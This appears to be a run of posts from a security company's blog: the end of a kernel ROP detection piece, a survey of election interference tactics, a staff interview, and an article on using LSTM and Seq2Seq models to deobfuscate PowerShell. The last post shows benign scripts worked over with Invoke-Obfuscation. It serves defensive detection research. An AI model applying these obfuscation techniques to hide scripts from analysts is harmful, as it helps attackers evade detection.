Generating an interrupt for every return instruction is too costly. Instead we exploit the fact that ROP tends to generate a lot of branch mispredictions. We program the PMU to only generate interrupts for mispredicted branches. When the interrupt fires, we validate every return address that was recorded in the LBR. If any of them are not in the aforementioned policy (aka not call preceded), we consider that a control flow violation. If you don’t tune these systems correctly, they can generate too many interrupts and adversely affect system performance. As the demo below shows, with proper tuning we saw roughly a 1% reduction in the JetStream browser benchmark score, while still maintaining 100% detection rate against our exploit. The final demo below walks through kernel mode ROP detection.

Demo 4: Detecting Kernel ROP

Conclusion

Windows platform security has greatly improved over the last decade, but kernel mode threats are still a big concern. To leverage the latest defenses from Microsoft, you should upgrade to the latest Windows 10 and enable as many protections as feasible in your organization (Secure Boot, VBS, HVCI, etc). Virtualization Based Security is the single largest pain point from a kernel mode attacker’s perspective, but unfortunately it does come with many compatibility issues. Ensure that you are collecting telemetry on the drivers being loaded across your endpoints. Leverage this data to spot anomalous or vulnerable drivers being loaded. Finally, leverage tools that allow you to hunt and detect kernel mode malware that may already be present in your network. Though this may seem like a large endeavor, we hope these two blogs and our two open source tools help raise awareness of kernel mode threats and facilitate protections as these threats evolve.

Election interference analyses remain retrospective and insular, focusing largely on the U.S. 2016 presidential election, and the cyber-enabled data theft, disinformation, and bots involved. That was by no means the first time an entity digitally compromised part of the election infrastructure, and it won’t be the last attempt. A decade ago, reports suggest China stole data from both the McCain and Obama campaigns, and intelligence and national security experts warn that multiple actors may attempt to influence the 2018 U.S. midterm elections.

Election interference has been attempted as long as there have been elections. However, digital innovations have introduced a new range of attack vectors aimed at compromising everything from voting machines to hearts and minds. According to Freedom House, at least 18 countries experienced some form of election interference in 2016. Given the growing relevance of digital election interference, and with midterm elections a month away, it is useful to explore the range of election interference tactics attempted globally to best comprehend the current state and motivations of adversarial behavior, and in turn structure defenses accordingly.

Think Globally

There have always been creative, and often deadly, ways to influence election outcomes, running the gamut from coup attempts to illicit funding to voter suppression. While those are certainly still a concern, it is necessary to better comprehend 'election hacking', a nebulous concept broadly applied as an umbrella term for a wide range of election interference activities. Through global analysis of recent election interference, a few categories emerge and offer insights into how to best protect a core component of American democracy.

Website Interference

Website defacement and interruptions are perhaps the most common digital election interference tactic, likely due to the low cost, skills, and resources required. These attacks often target official websites and social media sites for campaigns, candidates, and political parties, as well as media outlets and government institutions.

There have already been at least two U.S. municipal campaigns hit with distributed denial of service (DDOS) attacks, but this has been a global trend for several years. In 2014, the Ukraine election commission website experienced a DDOS attack and was forced to briefly shut down just before parliamentary elections. A news website was also vandalized, displaying graphic images instead of political ads.

More recently, German Chancellor Angela Merkel’s website was attacked prior to an election debate last year, and local party branches were increasingly targeted for vulnerabilities. A DDOS attack hit the Mexican National Action Party (PAN) website earlier this year during a debate, while the website of Taiwan’s Democratic Progressive Party (DPP) was vandalized and the content was replaced with Chinese propaganda. Social media sites of candidates are also prime targets, as Nicolas Maduro discovered following his election when his Twitter account was hacked. Voter registration and voting information sites are also at risk. During the Brexit referendum, the voter registration crash may have resulted from a DDOS.

Data Access & Manipulation

Data access, theft, and manipulation is arguably the most prominent and impactful form of election interference. The targets include politicians, members of their campaigns, as well as voting machines and voter registration databases. Spear phishing is perhaps the most common attack vector in this category, although servers are also targeted and often found unprotected. As the breach of John Podesta’s personal email demonstrates, both corporate and business email is targeted.

These attacks have disrupted elections globally, often resulting in leaked and/or manipulated emails aimed at weakening or embarrassing a candidate. During the 2017 French presidential election, then presidential candidate Emmanuel Macron’s emails were leaked days prior to the election. Almost nine gigabytes of data were leaked, and quickly followed by various bot-driven campaigns to disseminate the data. In the run-up to Cambodia’s July election, numerous organizations connected to the opposition party and voting process, including the National Election Commission as well as members of Parliament, were victims of a phishing campaign. In this case, the motive appears to be espionage.

There also is the example of Andres Sepulveda, who allegedly has made a career out of interfering in Latin American elections by leading a “team of hackers that stole campaign strategies, manipulated social media to create false waves of enthusiasm and derision, and installed spyware in opposition offices.” Over the last decade, these campaigns allegedly focused on elections in Nicaragua, Panama, Honduras, El Salvador, Colombia, Mexico, Costa Rica, Guatemala, and Venezuela. The motivation in this case seems purely financial.

Voter registration sites are also prime targets. These tend to be more sophisticated attacks, often with the intent to steal credentials to access the larger database. At least 21 states’ voter registration databases were targeted (and one compromised) during the U.S. 2016 presidential election. In the Philippines, the election commision website was first vandalized, and then compromised, resulting in the subsequent leaking of 55 million voters’ data as well as defacement of their website. For comparison, this breach was over twice as large as the U.S. Office of Personnel Management compromise.

Finally, stuffing ballot boxes and ballot fraud is by no means new, so hacking voting machines has understandably received a lot of attention as a target for data manipulation. With more than a dozen U.S. states lacking an audit trail, some voting machines containing backdoors, and election machine compromise proven a legitimate concern at recent security conferences, states are increasingly prioritizing voting machine security. Interestingly, U.S. concerns about voting machine compromise has permeated into diplomatic discussions. Nikki Haley, U.S. Ambassador to the United Nations, warned Congo against using electronic voting machines in favor of paper elections for their December elections. Congo’s current machines not only are susceptible to manipulation, but experts are also concerned about their inability to guarantee secrecy.

Controlling the narrative: Disinformation and disruptions

While Russian trolls are understandably the most notorious disinformation group, many state and state-affiliated groups often seek to control the narrative. This form of election interference largely occurs through disinformation campaigns - defined by Facebook as inaccurate or manipulated information/content that is intentionally spread - or through information disruptions.

Focusing first on disinformation, seemingly every recent European election has been targeted, ranging from elections in Italy, Sweden, and Turkey to referendums in Ireland, the United Kingdom, and Macedonia. Elections across the globe face similar disinformation threats. Former national security advisor H.R. McMaster acknowledged similar disinformation tactics targeting the Mexican presidential election. In Kenya, disinformation in content and imagery surrounding 2017 elections aimed at instigating conflict and exacerbating societal divisions, including videos that portrayed election violence from previous years as live. In fact, in the recent survey The Reality of Fake News in Kenya, 87% of respondents suspected they were recipients of intentionally misleading or fake information.

While most think of social media as the key medium for transferring disinformation, Moldova provides an illustrative example of additional tactics. Prior to local elections in Moldova, doctored videos were included within a news segment via a self-proclaimed news outlet, demonstrating the impact of basic video manipulation. These basic manipulations pale in comparison to what is on the horizon with voice mimicry or emerging deep fake technologies that are currently discussed in Congress.

While disinformation is one form of manipulating opinions prior to an election, internet service disruptions also aim to influence voter behavior. Back in 2010, Myanmar experienced a disruption that cut internet connectivity just days before the first election in 20 years. According to Freedom House, Zambia and Gambia each experienced internet service disruptions leading up to an election. Surrounding Mali’s recent election, an internet advocacy group accuses the government of intentionally disrupting access as a means to limit communication and impede the activities of opponents. While these kinds of blackouts are less likely in countries with full internet penetration, it was only two years ago that the Mirai bot took down internet connectivity in parts of the East Coast, as well as some social media sites. Also, in 2016, an internet outage for close to a million Germans sparked concerns over vulnerability to election interferences. More recently, Brazil’s upcoming presidential election has already triggered concerns that this tactic may be employed, as the government has previously blocked messaging apps.

Looking Ahead

For defenders of democratic integrity across the globe, one of the biggest failures in understanding election interference is a failure of imagination. For instance, prior to the 2016 Montenegrin parliamentary election, a coup plot was foiled that would have included a hack into messaging apps, the dispersal of disinformation claiming the ruling party rigged the election, and then hired mercenaries to take advantage of the chaos to storm the Parliamentary building and assassinate the prime minister. While this is an extreme example, it is essential to consider the range of potential interference techniques and structure defenses accordingly.

As website interference, data theft and manipulation and controlling the narrative become entrenched components of election interference, defenders must comprehend how these tactics can be mixed and matched for unprecedented impact. By looking globally at the various modes of interference, local and state campaigns can more proactively defend against potential digital attacks. The notion of ‘hacking elections’ must be replaced with more nuanced comprehension of the various attack vectors and potential attackers who are motivated to influence an election.

At the same time, there are examples of successfully countering election interference. Twitter’s new policy change for more robust removal of bots and fake personas and prohibition of hacked materials dissemination may have incorporated insights from French election preparations. Only by looking globally can lessons learned help inform election defenses and proactively protect against digital attacks on democratic institutions.

New Endgamer, Ian McShane, sat down with us to answer a few questions about what led him here. Our discussion explored UX in security, avoiding the ‘one size fits all’ model, and what's next for him as our VP of Product Marketing.

Tell us about your new role

Ian: I’ve been passionate about building and shipping great products for over a decade, and I’ve become especially interested in delivering the best user experience possible for security admins of all experience levels. I know firsthand from my practitioner days that the day-to-day UX can make or break a platform - and the person using it! At Endgame, I’m looking forward to helping organizations identify, understand, and solve their biggest endpoint security problems in a way that’s right for them.

What are some of the biggest challenges facing IT leaders today?

Ian: A lot has already been said about some of the most common organizational challenges - struggles with basic security principles like patch and vulnerability management, authentication and account protection, and system hardening. But one of the biggest challenges for a CISO or IT leader is the sheer scale of products and solutions available across the infosec industry. With so much work and so little time, many organizations have fallen for the “one size fits all” promises of vendors that offer products and solutions appearing - at first glance - to solve many problems with little to no configuration or ongoing administration.

The reality is that each and every organization has its own unique requirements and unique ways of working that make “one size fits all” almost impossible. Moreover, it’s important to understand what skills and capabilities an organization has available to dedicate to new technologies and new processes. Discovering six months into a multi-year subscription that the product requires far more hands-on work than initially expected, or needs additional subscriptions or products to fully achieve value, is an expensive realization and one that can be very difficult to recover from.

What do customers struggle with in relation to security?

Ian: Until a few years ago the biggest issues always seemed to be budget related, but with more organizations realizing that they need to proactively invest in security, the real struggle has become staffing their security teams with experienced analysts. Back to what I said earlier, I’m passionate about the security admin user experience, and how vendors can improve a security administrator’s day-to-day work process has already become a key differentiator in a saturated market.

Why did you choose Endgame?

Ian: There’s so much to be excited about at Endgame, but the things that are important to me are people, culture, and obviously technology. Every person I met at Endgame was smart and engaging, and it was quickly evident that the company is passionate about the things that I find important - for example, a commitment to transparency, to investing in initiatives that help give back to our industry, and to help it grow through diversity and technical excellence.

On the product side, we’re one of the few vendors that are really making a difference in the quality of life for security admins by providing advanced capabilities in ways that are easy to consume and that, frankly, work at a ridiculous scale.

Ian recently joined Endgame as Vice President of Product Marketing. He formerly led the Gartner Magic Quadrant for Endpoint Protection Platforms as a security and risk management analyst.

One lesson that security professionals learn early on is that attackers don’t like to make your job easy. They have a range of techniques to obfuscate location, network traffic, or raw code. This in turn makes it harder to for defenders to detect and block what they can’t find or to understand something that is illegible. In the realm of coding, obfuscation is using the functions and quirks of the language to create a command that is easily machine readable but much harder to recognize by human eyes.

Obfuscation techniques continue to advance, but fortunately defenders are becoming increasingly aware and developing complementary deobfuscation techniques. As I presented earlier this year at BSides Charm, there are some exciting ways to apply machine learning (ML) to combat PowerShell obfuscation. But before getting into some solutions, let’s take a look at a few common obfuscation techniques, specifically focusing on PowerShell use by attackers.

PowerShell Obfuscation by Attackers

PowerShell is powerful. It was designed to automate tasks from the command line and handle configuration management, and for that many important tools were created. The aspects that make PowerShell so effective - such as easy to import modules, access to core APIs, and remote commands - also make it one of the go-to tools for attackers to execute file-less attacks. Living off the land (using native or pre-installed tools to carry out a mission) has grown in popularity, at least partially due to advances in file-based AV systems such as ML engines to detect never before seen attacks.

Fortunately for analysts and defenders, PowerShell commands can be logged and script files can be captured for analysis. This gives us a chance to perform after-action forensics to see what the attacker was up to and if they were successful. Unfortunately, attackers don’t like making this easy, so they will often obfuscate and encode commands to deter and slow down analysts.

Each language will have its own methods, many of which are shared, but for PowerShell some of the most common are:

Some PS variables/names are case insensitive.

The opposite of concatenate. This may or may not be a real word. Let’s say it is.

Typically used for inserting variables into command statements, in this case its used to jumble string components.

Backticks can be used as a line continuation character and sometimes to signify a special character. But, if you use a backtick in the middle of a variable it “continues” the line to the next characters in the same line.

Converts a string into a command operation.

Whitespace is irrelevant in some operations, so adding it just makes reading harder.

This replaces characters with their information representing their ascii codes.

There are also more complicated obfuscations like Variable Creation and Replacement. This is where an obfuscator defines a random variable as all or part of a string and inserts/replaces it in that string's place through the file. There are many ways to implement the replacement. Below are a couple of examples:

Format Operator: https://ss64.com/ps/syntax-f-operator.html

Input: {1}PSScriptRoot{0}..{0}PSVersionCompare.psd1 -F ‘\’,’$’

Output: $PSScriptRoot\..\PSVersionCompare.psd1

Replace Function: https://ss64.com/ps/replace.html

Input: (pZyPSScriptRoot\Add-LTUser.ps1).replace('pZy',’$’)

Output: $PSScriptRoot\Add-LTUser.ps1

There are more examples that we won’t get into, but it’s a finite list so all these are solvable.

All of these methods and more are made easily accessible with Daniel Bohannon’s Invoke-Obfuscation module. It was our go-to source for all obfuscation and encoding work in our research.

Using Invoke-Obfuscation, we can employ multiple obfuscations at once, for example:

Before:

$packageName = 'kvrt'
$url = 'http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe'
$checksum = '8f1de79beb31f1dbb8b83d14951d71d41bc10668d875531684143b04e271c362'
$checksumType = 'sha256'
$toolsPath = "$(Split-Path -parent $MyInvocation.MyCommand.Definition)"
$installFile = Join-Path $toolsPath "kvrt.exe"
try {
  Get-ChocolateyWebFile -PackageName "$packageName" `
                        -FileFullPath "$installFile" `
                        -Url "$url" `
                        -Checksum "$checksum" `
                        -ChecksumType "$checksumType"

  # create empty sidecars so shimgen only creates one shim
  Set-Content -Path ("$installFile.ignore") `
              -Value $null

  # create batch to start executable
  $batchStart = Join-Path $toolsPath "kvrt.bat"'start %~dp0\kvrt.exe -accepteula' | Out-File -FilePath $batchStart -Encoding ASCII
  Install-BinFile "kvrt""$batchStart"
} catch {
  throw $_.Exception
}

Figure 1: Original Powershell Script Example

After:

${P`ACka`Ge`NAMe} = ("{0}{1}" -f 'kv','rt')
${U`RL} = ("{4}{11}{0}{6}{10}{3}{7}{2}{13}{15}{1}{16}{5}{8}{9}{14}{12}"-f'persky-','il','com/dev','bs','http:/','/','l','.','KVR','T/late','a','/devbuilds.kas','T.exe','b','st/full/KVR','u','ds')
${Check`s`UM} = ("{15}{16}{10}{3}{11}{6}{14}{9}{4}{5}{13}{1}{8}{7}{12}{2}{0}"-f 'c362','84143b0','71','79beb31f1d','1','bc','495','e','4','d71d4','e','bb8b83d1','2','10668d8755316','1','8f','1d')
${C`HE`cksu`m`TYpe} = ("{1}{0}" -f'56','sha2')
${T`Ool`s`PATH} = "$(Split-Path -parent $MyInvocation.MyCommand.Definition) "
${instALL`F`i`Le} = .("{0}{2}{1}{3}" -f'J','-Pa','oin','th') ${tOO`lSP`ATh} ("{0}{1}{2}" -f 'k','vrt.e','xe')
try {
  &("{2}{5}{0}{4}{3}{1}" -f'colateyWe','e','Ge','Fil','b','t-Cho') -PackageName "$packageName" `
                        -FileFullPath "$installFile" `
                        -Url "$url" `
                        -Checksum "$checksum" `
                        -ChecksumType "$checksumType"&("{2}{3}{0}{1}"-f '-','Content','Se','t') -Path ("$installFile.ignore") `
              -Value ${nu`Ll}

  
  ${B`At`C`HSTart} = &("{0}{2}{1}{3}"-f 'J','i','o','n-Path') ${TOol`s`patH} ("{0}{2}{1}" -f 'k','.bat','vrt')
  ((("{1}{2}{3}{4}{5}{7}{0}{6}"-f'ce','start ','%','~dp0{0','}k','vrt','pteula','.exe -ac'))-f [CHar]92) | .("{0}{1}{2}"-f 'Out-','Fi','le') -FilePath ${BA`T`c`hstARt} -Encoding ("{0}{1}"-f 'AS','CII')
  &("{1}{0}{3}{2}"-f'l-','Instal','nFile','Bi') ("{0}{1}"-f 'k','vrt') "$batchStart"
} catch {
  throw ${_}."E`X`CEPtiOn"
}

Figure 2: Powershell Script Example after Obfuscation via Invoke-Obfuscation

Encoding Techniques

Text can also be converted into other character mapping schemes to further obfuscate it. In this analysis we’ve only concerned ourselves with two schemes: ascii to hex and ascii to decimal. For example, ‘A’ would map to ‘41’ in hex and ‘65’ in decimal and ‘[‘ would map to ‘5B’ in hex and ‘91’ in decimal.

Fully encoding a script in PowerShell requires some additional logic the interpreter can use to decode the text. An example script encoded to a decimal representation is shown below.

You might notice that even the logic used to decode the sequences is obfuscated in this example. Invoke-Obfuscation can really do a number on scripts.

.((gET-varIAble '*MDR*').nAME[3,11,2]-JoiN'')([chAR[]] ( 36,112, 97, 99,107, 97 ,103, 101 , 78 , 97 ,109, 101 ,32 ,61 ,32 , 39 , 107 , 118,114 , 116 ,39 , 10 , 36 ,117 ,114 ,108 , 32 ,61 , 32,39,104 , 116, 116, 112,58,47 , 47 , 100 , 101 ,118, 98, 117 , 105, 108, 100 , 115,46, 107 , 97 , 115,112, 101,114,115, 107, 121,45,108,97, 98 , 115, 46 , 99 , 111 , 109 , 47, 100 ,101, 118 , 98 ,117,105, 108 , 100,115,47 ,75 , 86 ,82, 84,47 ,108 , 97, 116 ,101, 115 ,116,47 ,102 ,117, 108,108,47, 75 , 86,82 , 84 ,46, 101 ,120 ,101, 39, 10 , 36,99 , 104,101 ,99 , 107 ,115,117 , 109, 32 ,61,32, 39 , 56, 102, 49,100 ,101, 55,57 , 98, 101 , 98,51, 49 , 102,49, 100, 98 ,98,56,98 , 56,51,100, 49, 52, 57, 53 ,49,100,55, 49,100,52 , 49 , 98,99,49 ,48 , 54, 54, 56 , 100 , 56, 55, 53 ,53 , 51,49 , 54 , 56 , 52,49, 52 ,51 ,98, 48 , 52 , 101 ,50 , 55 , 49, 99 , 51 ,54, 50, 39 , 10 ,36, 99,104 , 101, 99 ,107, 115 ,117 , 109,84,121, 112, 101,32, 61,32 ,39, 115 , 104 , 97 , 50, 53,54 ,39 , 10 ,36 , 116 ,111 ,111 , 108 , 115, 80 ,97,116 ,104, 32, 61 , 32 ,34, 36,40 , 83 , 112 ,108, 105 , 116 , 45 , 80,97, 116 ,104, 32,45 ,112, 97 , 114 , 101, 110 ,116 ,32 , 36, 77 ,121 ,73 , 110, 118 ,111, 99 ,97, 116 , 105 ,111,110, 46, 77, 121 ,67 , 111,109, 109, 97, 110 , 100 ,46 , 68, 101 ,102,105 ,110, 105 , 116 , 105, 111, 110,41,34 ,10 , 36,105,110 , 115 , 116 , 97 ,108 ,108, 70 , 105, 108 ,101,32, 61 ,32, 74,111 , 105 ,110 ,45 , 80 ,97, 116, 104, 32 ,36, 116 , 111,111,108, 115 , 80 , 97,116,104,32 ,34,107, 118,114, 116 , 46,101,120,101, 34, 10, 116 , 114 , 121, 32,123 ,10 , 32,32, 71 ,101 , 116, 45, 67,104, 111 , 99 , 111 , 108,97, 116,101 , 121, 87, 101, 98, 70,105, 108,101 , 32 ,45 ,80, 97, 99,107,97, 103 , 101,78,97, 109, 101 , 32,34, 36, 112,97 ,99, 107, 97,103 , 101 , 78 , 97 , 109 ,101,34 , 32 , 96,10,32, 32,32 ,32 ,32 ,32,32,32 , 32, 32,32, 32 ,32,32, 32,32 , 32 ,32, 32 ,32 ,32, 32,32,32, 45,70,105 ,108 , 101, 70,117 , 108 ,108 ,80,97,116 ,104, 32, 34, 36,105 ,110 , 115 , 116 , 97,108, 108 , 70 ,105 ,108, 101 ,34, 32,96 ,10 , 32, 32,32 , 32 ,32,32,32 ,32 , 32,32, 32 ,32,32 , 32 , 32,32, 32,32 , 32, 32 ,32 ,32 , 32 ,32 ,45,85 , 114, 108, 32 , 34,36, 117, 114 , 108,34 ,32 ,96,10 , 32,32,32,32,32 , 32 , 32 ,32 ,32 ,32 ,32 ,32,32 , 32, 32,32 , 32,32, 32 ,32 ,32, 32 ,32 , 32,45,67 ,104 ,101, 99 , 107 , 115 , 117, 109 ,32 , 34 , 36 ,99,104,101, 99 , 107,115, 117 , 109 ,34,32, 96,10,32,32, 32 ,32, 32,32 ,32 , 32 , 32 ,32 , 32 , 32,32 , 32, 32, 32 ,32 ,32 , 32, 32 ,32, 32,32, 32,45,67,104 , 101 , 99 , 107,115 ,117 , 109 , 84 , 121 , 112, 101, 32 ,34,36, 99, 104,101, 99,107,115 , 117 , 109, 84, 121,112, 101, 34 , 10, 10, 32 ,32 , 35 , 32, 99 ,114 ,101 , 97 ,116 ,101 , 32 ,101,109, 112,116 , 121,32, 115 ,105 ,100 , 101 ,99 ,97, 114 ,115 ,32 ,115 ,111 ,32, 115 ,104 ,105 ,109,103 , 101 , 110 ,32,111 ,110,108 , 121,32,99 ,114 ,101 ,97 , 116 , 101, 115 , 32, 111 ,110 , 101 , 32,115 , 104 ,105 ,109, 10,32 , 32,83 , 101 , 116 , 45 ,67,111, 110 ,116 ,101,110 , 116, 32 ,45 ,80 , 97, 116 ,104, 32, 40 ,34,36,105,110, 115,116,97, 108,108, 70 ,105, 108,101 , 46 , 105 ,103, 110,111 , 114 , 101 , 34 ,41, 32, 96 , 10 , 32,32 , 32, 32,32 , 32,32 , 32, 32 ,32, 32,32,32 , 32 , 45,86,97, 108 ,117 ,101 , 32 , 36 , 110 , 117 , 108, 108 , 10, 10 ,32, 32, 35,32 , 99 , 114,101 , 97 ,116 ,101 , 32 , 98 ,97 ,116 , 99,104 , 32 ,116 , 111 ,32,115, 116, 97,114, 116, 32 , 101, 120 , 101 ,99 , 117 , 116, 97 ,98 , 108 ,101, 10,32 , 32 , 36 ,98 ,97, 116 , 99 , 104, 83,116, 97 ,114 , 116 ,32,61, 32 ,74,111,105, 110, 45, 80, 97, 116 , 104,32, 36 , 116 , 111,111,108,115, 80,97 , 116,104,32 , 34 ,107 , 118, 114,116 , 46 , 98 ,97 , 116 , 34 ,10,32, 32 , 39,115 ,116,97 , 114, 116,32,37, 126,100, 112, 48 ,92, 107,118 ,114, 116, 46 , 101, 120,101 , 32 , 45 ,97, 99, 99 ,101 , 112 , 116 ,101 ,117 ,108, 97 ,39 , 32,124, 32 ,79 , 117, 116, 45,70, 105 , 108, 101 , 32 , 45, 70 ,105 ,108 ,101 ,80, 97 ,116,104, 32 ,36,98, 97, 116,99 ,104, 83 ,116, 97 ,114 , 116 ,32, 45 , 69, 110 , 99 ,111 , 100 , 105,110, 103 ,32 ,65 , 83,67, 73,73, 10 ,32, 32 ,73,110, 115, 116 ,97 , 108,108 , 45 , 66,105 , 110,70,105, 108 , 101 , 32,34 , 107,118 ,114, 116 , 34 , 32 ,34,36, 98 , 97 , 116, 99 , 104, 83 , 116 ,97, 114,116 ,34,10, 125 ,32 ,99,97 , 116,99,104 ,32, 123,10 , 32 , 32 ,116 , 104, 114 , 111 , 119 ,32 , 36 , 95, 46, 69 ,120 , 99, 101 ,112 ,116 ,105 ,111 , 110 , 10,125 )-jOIN'')

Figure 3: Powershell Script Example after Encoding via Invoke-Obfuscation

How Do We Deobfuscate?

To solve this problem, we created a series of operations to tackle each of the issues presented.

First, we gathered data and built a classifier to determine if a sample is encoded, obfuscated, or plain text. Samples can be both obfuscated and encoded, so we’ll need to reuse this classifier to make sure our final product is complete. Then we iteratively applied decoding and deobfuscation logic, while checking the output of each application to see if more work is required. Finally, we implemented a cleanup neural network, a new approach to deobfuscation, to fix some of the odd bits of obfuscation that can’t be handled by simple logic alone.

Figure 4: Deobfuscation Logic Flow

Find What We're Working With

Our first task is building something that can determine if a sample is encoded, obfuscated, or plain text. To that end, we built a machine learning classifier to automatically make that determination.

Building a Status Classifier

The typical machine learning approach for building and training classifiers is to:

Gather lots of samples with labels (e.g. hex encoded, obfuscated, plain text)
Generate numerical features on those samples
Train using your selected algorithm

Figure 5: Classifier Steps

Often the hardest part of building a classifier is getting the samples and labels. For this problem, some solutions for finding samples include downloading from file sharing services or scrapping Github. Luckily, after we have a corpus of PowerShell script samples, we can generate the obfuscated and encoded samples on demand with Invoke-Obfuscation!

Next up is generating features for our samples. Text can be a little tricky for a classifier. The classical machine learning approach (e.g., train a logistic regression model) is to hand define and generate summary statistics and other relevant features of your sample, such as:

# of characters
# of vowels
Entropy
# of ` marks
# of numbers

However, these sorts of features often do not express the relationship between characters well.

Instead, we're going to use a type of neural network called a LSTM.

A LSTM (long-short term memory) network is a specialized RNN (recurrent neural network). These networks are useful because they retain a memory of previous states and use that in combination with the current input to determine the next state. Here is a good explanatory blog on what LSTMs are and how they operate, or some of our own previous research into building an LSTM to detect domain generation algorithms.

Figure 6: LSTM Diagram

Getting started with neural networks can seem a little bit intimidating, however high-level frameworks for management make the initial application very easy.

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)
model = Sequential()
model.add(Embedding(num_encoder_tokens, embedding_vector_length, input_length=sample_len))
model.add(LSTM(100))
model.add(Dropout(0.2))
model.add(Dense(len(classes), activation='sigmoid'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
print(model.summary())
model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=epochs, batch_size=64)

In under ten lines we can take our input data, create a simple network, and train it.

Decoding

Figure 7: Powershell Script Example after Encoding via Invoke-Obfuscation

Decoding can be a relatively straightforward process if you have the encoding mappings and know when to apply the logic. This is exactly what the PowerShell interpreter does, and reimplementing that is a valid approach for the sample above.

However, I'm first and foremost data scientist, and I see a pattern here. You know what's good for patterns? Regex!

ascii_char_reg = r'([0-9]{1,3})[, \)]+'
ascii_chars = re.findall(ascii_char_reg, file_text)
chars = [chr(int(ac)) for ac in ascii_chars]
file_text = ''.join(chars)

With a Regex-based solution we create a decoder in just a few lines of code. It is also robust to the encoder logic obfuscation at the beginning and end of the sample, and it can work outside of a PowerShell script, so it is generalizable.

Deobfuscation

The bulk majority of the deobfuscation can be handled by simple logic: concatenating strings, removing `s, replacing variables, etc.

Some of these transformations are easy:

def remove_ticks(line):
    line = line[:-1].replace('`', '') + line[-1]
    return line

def splatting(line):
    splat_reg = r"""(&\( *['"]{1}(.+)?['"]{1} *?\))"""
    matches = re.findall(splat_reg, line)
    for match in matches:
        line = line.replace(match[0], match[1])
    return line

def string_by_assign(line):
    match_reg = r'(?:(\[[sS][tT][rR][iI][nN][gG]\])([\[\]A-Za-z0-9]+)[\)\,\.]+)'
    matches = re.findall(match_reg, line)
    for match in matches:
        replace_str = match[0] + match[1]
        line = line.replace(replace_str, "'" + match[1] + "'")
    return line

Some get a little more complicated. For reordering of strings based on '-f', the format operator, we:

Do char by char string processing to find either '-f' or '-F’
Find all the {[0-9]+} type placeholders before the '-f’
Find all the strings and valid non-string values after it
Replace the placeholders with the values
Iterate since you can do this multiple times in the same line.

It’s a little tedious, and there are multiple ways to do the same thing. But the list techniques is finite, so it is definitely a solvable problem even if we didn't enumerate every solution in our implementation.

After integrating all these deobfuscation techniques and applying them sequentially, we can see how well our code works.

Before:

param
(
    [Parameter(MANdAtORy=${FA`L`SE})] ${dO`m`AiN} = ("{2}{1}{0}{3}" -f 'a','rtr','ai','n.com'),
    [Parameter(MandatOrY=${tr`UE})]  ${Sr`NUM`BER},
    [Parameter(mAnDATORY=${F`AL`SE})] ${targET`p`Ath} = ("{10}{11}{1}{2}{9}{14}{3}{12}{5}{7}{4}{0}{8}{13}{6}" -f'=a','=Airtr','a','ir',',DC','a','C=com','n','i','n','OU=Disab','led,OU','tr','rtran,D',' Users,OU=A'),
    [Parameter(ManDAtOrY=${T`RUe})]  ${us`er}
)

if (&("{2}{1}{0}"-f'Path','est-','T') ${US`eR})
{
    ${USER`li`sT} = &("{0}{2}{3}{1}" -f'Ge','nt','t-','Conte') -Path ${u`SEr}
}
else
{
    ${usER`L`ISt} = ${Us`Er}
}

${c`oNT`AIneR} = ("{3}{11}{4}{8}{5}{0}{7}{10}{6}{2}{1}{9}" -f'ir','irtran,',',DC=a','OU','a',',OU=A','an','tran Users,OU=Air','bled','DC=com','tr','=Dis')
${D`eS`CrIP`TIon} = ('Term'+'ina'+'ted '+'per'+''+"$SrNumber")

foreach (${uS`eR} in ${U`S`E`RList})
{
    .("{2}{0}{1}" -f'et','-ADUser','S') -Identity ${Us`ER} -Server ${D`OM`AIN} -Enabled ${FA`LsE} -Description ${D`eSCrI`P`TION}
    ${UsE`RHan`dlE} = &("{2}{0}{1}"-f'U','ser','Get-AD') -Identity ${us`eR} -Server ${Do`M`AiN}
    &("{3}{1}{2}{0}" -f't','je','c','Move-ADOb') -Identity ${uSe`Rh`AnD`Le} -Server ${doM`A`In} -TargetPath ${C`O`Nt`Ainer}
}

Figure 8: Obfuscated Sample

After:

param
(
    [Parameter(MANdAtORy=${FALSE})] ${dOmAiN} = "airtran.com",
    [Parameter(MandatOrY=${trUE})]  ${SrNUMBER},
    [Parameter(mAnDATORY=${FALSE})] ${targETpAth} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com",
    [Parameter(ManDAtOrY=${TRUe})]  ${user}
)
if ("Test-Path" ${USeR})
{
    ${USERlisT} = "Get-Content" -Path ${uSEr}
}
else
{
    ${usERLISt} = ${UsEr}
}
${coNTAIneR} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com"
${DeSCrIPTIon} = ('Terminated per $SrNumber")
foreach (${uSeR} in ${USERList})
{
    "Set-ADUser" -Identity ${UsER} -Server ${DOMAIN} -Enabled ${FALsE} -Description ${DeSCrIPTION}
    ${UsERHandlE} = "Get-ADUser" -Identity ${useR} -Server ${DoMAiN}
    "Move-ADObject" -Identity ${uSeRhAnDLe} -Server ${doMAIn} -TargetPath ${CONtAiner}
}

Figure 9: Partially Deobfuscated Sample

That’s not too bad! But a few errors remain, and most share a pattern and look like: (MAndatoRy=${fAlSe})] ${dOMAiN}

This randomized casing is a different type of problem than we saw before. It makes the text harder to read, but not by applying PowerShell functions as obfuscation. While all of the previous techniques we’ve discussed could be run backwards to get the original input, randomized casing can not. For this, we need a different technique.

Reversing an Irreversible Function

This is where things get interesting. To take this one step further we’re going to use a neural network to learn, and sometimes memorize, what variables are supposed to look like.

If you were presented with the example:

MOdULEDiRectORy

based on your knowledge of English and programming, you could probably figure out a configuration of casing that makes sense. Perhaps one of these:

ModuleDirectory

moduleDirectory

moduledirectory

To mimic this cognition, we are going to train a Seq2Seq network. Seq2Seq stands for sequence to sequence. It’s a type of network (or networks) that is often used in machine translation.

Seq2Seq uses LSTMs (see our text classifier earlier) to create an encoder network to transform the starting text, and a decoder network to use the encoder output and the decoder memory. Combining these we are able to feed the input character by character and predict the output. Keras has a nice blog explaining how to create and train one of these networks. Our code generally follows their example.

We initially tried to use this network to translate entire lines. Since a Seq2Seq network builds the output character by character based on input characters and the last predicted output characters we can see how the test progresses along with the input. It started out well:

Input:

Becomes (looking good):

Then (starting to error):

Then finally (way off the rails):

Once bad predictions start, they can get out of hand.

To deal with bad predictions we constrained the problem and picked "words” in each line to consider.

Find the corresponding words in the obf and non-obf files
